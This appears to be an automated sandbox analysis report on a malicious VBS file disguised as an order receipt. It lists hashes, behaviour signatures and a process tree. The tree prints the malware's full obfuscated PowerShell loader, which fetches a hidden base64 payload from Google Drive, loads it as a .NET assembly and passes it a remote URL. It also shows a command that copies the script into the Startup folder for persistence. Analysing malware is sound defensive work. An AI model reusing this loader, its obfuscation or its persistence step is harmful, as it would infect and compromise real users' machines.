Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
29-10-2024 19:13
General
-
Target
order_receipt#277.vbs
-
Size
138KB
-
MD5
e845c7177b3fbef4bacea00df938bc28
-
SHA1
af8f1912ee1d5e2daa119d52537fc09a8316aa4d
-
SHA256
9eb00c37db0331a7a0ef2056bda5ffe8fde8d812f4d3f8b54f278ba041cfd2a0
-
SHA512
85c0b69a7f3b615b0796f882620d40c4bc5b8f79b3adffc11cee3b08085879f55c78c81a65671c2701139d4c68c39b27178730241be00a0054c37809936b0043
-
SSDEEP
1536:Qyb8Rgt5pzGGwEM9cW/9WoOv5xvX7Nvx48bOAobVHL3x:QybOgt5pCGwEM/FWXvnLNvxrbO3bVr3x
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
exe.dropper
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
-
Drops startup file 2 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of WriteProcessMemory 15 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\order_receipt#277.vbs"1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\order_receipt#277.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.sagic.vbs')')2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 103⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\order_receipt#277.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.sagic.vbs')')3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCc1ZFlpbWFnZVVybCcrJyA9IDhMVWh0dHBzOi8vZHJpdmUuZ29vZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9JysnMUFJVmdKSkp2MUY2dlM0cycrJ1VPeWJuSC1zRHZVaEJZd3VyIDhMVTs1ZFknKyd3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OzVkWWltYWdlQnl0ZXMgPSA1ZFl3ZWJDbGllbnQuRG93bmxvYWQnKydEYXRhKDVkWWltYWdlVXJsKTs1ZFlpbWFnZVRleHQgPSBbU3lzdGVtLicrJ1RleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg1ZFlpbWFnZUJ5dGVzKTs1ZFlzdGFydEZsYWcgPSA4TFU8JysnPEJBU0U2NF9TJysnVEFSVD4+OExVOzVkWWVuZEZsYWcgJysnPSA4TFU8PEJBU0U2NF9FTkQ+PjhMVTs1ZFlzdGFydEluJysnZGV4ID0gNWRZaScrJ21hZ2VUZXh0LkluZGV4T2YoNWRZc3RhcnRGbGFnKTs1ZFllbmRJbmRleCA9IDVkWWltYWdlVGV4dC5JbmRleE9mKDVkWWVuZEZsYWcpOzVkWXN0YXJ0SW5kZXggLWdlIDAgLWFuZCcrJyA1ZFllbmRJbmRleCAtZ3QgNWRZc3RhcnRJbmRleDs1ZFlzdGFydEluZGV4ICs9IDVkWXN0YXJ0RmxhZy5MZW5ndGg7NWRZYmFzZTY0TGVuZ3RoID0gNWRZZW5kSW5kZXggLSA1ZFlzdGFydEluZGV4OzVkWWJhc2U2NENvbW1hbmQgPSA1ZFlpbWFnZVRleHQuU3Vic3RyaW5nKDVkWXN0YXJ0JysnSScrJ25kZXgsIDVkWWJhc2U2NExlbmd0aCk7NWRZYmFzZTY0UmV2ZXJzZWQgPSAtam9pbicrJyAoNWRZYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIEluZiBGb3JFYWNoLU9iamVjdCB7IDVkWScrJ18gfSlbLTEuLi0oNWRZYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTs1ZFljb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDVkWWJhc2U2NFJldmVyc2VkKTs1ZFlsb2FkZWRBc3NlbWJseSA9IFtTeScrJ3N0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoNWRZY29tbWFuZEJ5dGVzKTs1ZFl2YWlNZXRob2QgPSAnKydbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDhMVVYnKydBSThMVSk7NWRZdmFpTWV0aG9kLkludm9rZSg1ZFludWxsLCBAKDhMVXR4dC5zZ2EnKydyZXZldHMvanhzbi8xNTEuMTEuNjkxLjU4MS8vOnB0dGg4TFUsIDhMVWRlJysnc2F0aXZhZG84TFUsIDhMVWRlc2F0aXZhZG84TFUsIDhMVWRlc2F0aXZhZG84TFUsIDhMVVJlZ0FzbThMVSwgOExVZGVzYXRpdmFkbzhMVSwgOExVZGVzYXRpdmFkbzhMVSw4TFVkZXNhdGl2YWRvOEwnKydVLDhMVWRlc2F0aXZhZG84TFUsOExVZGVzYXRpdmFkbzhMJysnVSw4TFVkZXNhdGl2JysnYWRvOExVJysnLDhMVWRlc2F0aXZhZG84TFUsOExVMThMVSw4TFVkZXNhdGl2YWRvOExVKSk7JykuckVQTGFjRSgoW0NIQVJdNTYrW0NIQVJdNzYrW0NIQVJdODUpLFtzVFJJTmddW0NIQVJdMzkpLnJFUExhY0UoJzVkWScsJyQnKS5yRVBMYWNFKChbQ0hBUl03MytbQ0hBUl0xMTArW0NIQVJdMTAyKSwnfCcpIHwgJiAoICRTaGVMTGlkWzFdKyRzSGVMTElkWzEzXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('5dYimageUrl'+' = 8LUhttps://drive.google.com/uc?export=download&id='+'1AIVgJJJv1F6vS4s'+'UOybnH-sDvUhBYwur 8LU;5dY'+'webClient = New-Object System.Net.WebClient;5dYimageBytes = 5dYwebClient.Download'+'Data(5dYimageUrl);5dYimageText = [System.'+'Text.Encoding]::UTF8.GetString(5dYimageBytes);5dYstartFlag = 8LU<'+'<BASE64_S'+'TART>>8LU;5dYendFlag '+'= 8LU<<BASE64_END>>8LU;5dYstartIn'+'dex = 5dYi'+'mageText.IndexOf(5dYstartFlag);5dYendIndex = 5dYimageText.IndexOf(5dYendFlag);5dYstartIndex -ge 0 -and'+' 5dYendIndex -gt 5dYstartIndex;5dYstartIndex += 5dYstartFlag.Length;5dYbase64Length = 5dYendIndex - 5dYstartIndex;5dYbase64Command = 5dYimageText.Substring(5dYstart'+'I'+'ndex, 5dYbase64Length);5dYbase64Reversed = -join'+' (5dYbase64Command.ToCharArray() Inf ForEach-Object { 5dY'+'_ })[-1..-(5dYbase64Command.Length)];5dYcommandBytes = [System.Convert]::FromBase64String(5dYbase64Reversed);5dYloadedAssembly = [Sy'+'stem.Reflection.Assembly]::Load(5dYcommandBytes);5dYvaiMethod = '+'[dnlib.IO.Home].GetMethod(8LUV'+'AI8LU);5dYvaiMethod.Invoke(5dYnull, @(8LUtxt.sga'+'revets/jxsn/151.11.691.581//:ptth8LU, 8LUde'+'sativado8LU, 8LUdesativado8LU, 8LUdesativado8LU, 8LURegAsm8LU, 8LUdesativado8LU, 8LUdesativado8LU,8LUdesativado8L'+'U,8LUdesativado8LU,8LUdesativado8L'+'U,8LUdesativ'+'ado8LU'+',8LUdesativado8LU,8LU18LU,8LUdesativado8LU));').rEPLacE(([CHAR]56+[CHAR]76+[CHAR]85),[sTRINg][CHAR]39).rEPLacE('5dY','$').rEPLacE(([CHAR]73+[CHAR]110+[CHAR]102),'|') | & ( $SheLLid[1]+$sHeLLId[13]+'X')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD561a939d1e4ff9fb695864f703cba91c4
SHA19fb24675eaa6a1dfa0fe8924c01fabfbaa5e8946
SHA25627c4807d2bc7bda1351d92d133f670a51d5e9a7920619abc8a00fc3b0f9e187e
SHA512ef56ed531e536f376a886347f157ae5a80d38ec7a77502f11eb6e821555a3a4dcfecd659228f892c10331c2e3b80292da385d1d8b08eff2fbe9ee0d1d0147cdd
-
Filesize
1.4MB
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
2.9MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
32KB
-
Filesize
9.6MB